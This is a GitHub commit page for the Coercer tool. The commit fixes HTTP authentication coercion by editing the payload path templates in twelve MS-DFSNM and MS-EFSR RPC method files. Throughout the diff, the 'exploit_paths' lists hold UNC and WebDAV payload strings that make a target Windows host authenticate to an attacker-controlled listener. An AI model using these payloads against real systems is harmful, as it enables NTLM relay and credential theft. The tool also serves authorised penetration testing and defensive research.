Skip to content

Commit

Permalink
Fixed #42, Coercing HTTP Authentications did not work properly
Browse files Browse the repository at this point in the history
  • Loading branch information
p0dalirius committed Oct 4, 2023
1 parent b0cefa9 commit 83a1fd7
Show file tree
Hide file tree
Showing 12 changed files with 15 additions and 14 deletions.
2 changes: 1 addition & 1 deletion coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py
Original file line number Diff line number Diff line change
Expand Up @@ -43,7 +43,7 @@ class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
2 changes: 1 addition & 1 deletion coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py
Original file line number Diff line number Diff line change
Expand Up @@ -42,7 +42,7 @@ class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py
Original file line number Diff line number Diff line change
Expand Up @@ -59,7 +59,7 @@ class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
7 changes: 4 additions & 3 deletions coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py
Original file line number Diff line number Diff line change
Expand Up @@ -63,9 +63,10 @@ class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL):
"""

exploit_paths = [
("smb", '\\\\{{listener}}\\Share\\file.txt\x00'),
("smb", '\\\\{{listener}}\\Share\\\x00'),
("smb", '\\\\{{listener}}\\Share\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py
Original file line number Diff line number Diff line change
Expand Up @@ -41,7 +41,7 @@ class EfsRpcDecryptFileSrv(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -52,7 +52,7 @@ class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py
Original file line number Diff line number Diff line change
Expand Up @@ -40,7 +40,7 @@ class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py
Original file line number Diff line number Diff line change
Expand Up @@ -41,7 +41,7 @@ class EfsRpcFileKeyInfo(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py
Original file line number Diff line number Diff line change
Expand Up @@ -41,7 +41,7 @@ class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py
Original file line number Diff line number Diff line change
Expand Up @@ -40,7 +40,7 @@ class EfsRpcQueryRecoveryAgents(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py
Original file line number Diff line number Diff line change
Expand Up @@ -40,7 +40,7 @@ class EfsRpcQueryUsersOnFile(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py
Original file line number Diff line number Diff line change
Expand Up @@ -61,7 +61,7 @@ class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
Expand Down

0 comments on commit 83a1fd7

Please sign in to comment.